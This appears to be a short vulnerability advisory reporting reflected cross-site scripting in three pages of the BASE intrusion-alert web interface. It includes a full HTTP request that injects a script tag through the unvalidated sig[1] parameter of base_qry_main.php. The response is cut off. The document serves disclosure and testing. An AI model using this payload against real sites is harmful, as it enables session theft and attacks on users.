=== XSS Reflective === There are 3 pages that have Reflective XSS. /base/base_qry_main.php /base/base_stat_alerts.php /base/base_stat_uaddr.php === Example 1 ==== /base/base_qry_main.php the value of sig[1] is not being validated. === Request === GET /base/base_qry_main.php?search=1&sensor=+&ag=+&sig%5B0%5D=+&sig%5B2%5D=%3D&sig%5B1%5D=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sig_class=+&sig_priority%5B0%5D=+&sig_priority%5B1%5D=&time%5B0%5D%5B0%5D=+&time%5B0%5D%5B1%5D=+&time%5B0%5D%5B2%5D=+&time%5B0%5D%5B3%5D=&time%5B0%5D%5B4%5D=+&time%5B0%5D%5B5%5D=&time%5B0%5D%5B6%5D=&time%5B0%5D%5B7%5D=&time%5B0%5D%5B8%5D=+&time%5B0%5D%5B9%5D=+&submit=ADD+TIME&ip_addr%5B0%5D%5B0%5D=+&ip_addr%5B0%5D%5B1%5D=+&ip_addr%5B0%5D%5B2%5D=%3D&ip_addr%5B0%5D%5B3%5D=&ip_addr%5B0%5D%5B8%5D=+&ip_addr%5B0%5D%5B9%5D=+&ip_field%5B0%5D%5B0%5D=+&ip_field%5B0%5D%5B1%5D=+&ip_field%5B0%5D%5B2%5D=%3D&ip_field%5B0%5D%5B3%5D=&ip_field%5B0%5D%5B4%5D=+&ip_field%5B0%5D%5B5%5D=+&data_encode%5B0%5D=+&data_encode%5B1%5D=+&data%5B0%5D%5B0%5D=+&data%5B0%5D%5B1%5D=+&data%5B0%5D%5B2%5D=&data%5B0%5D%5B3%5D=+&data%5B0%5D%5B4%5D=+&new=1&sort_order=none&caller=&num_result_rows=-1¤t_view=-1 HTTP/1.1 Host: 172.16.105.130 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://172.16.105.130/base/base_qry_main.php?new=1 Cookie: PHPSESSID=dad4b449a7b0c4e0b397c29d960ae9c2 === Response === ...snip... ">
Classification: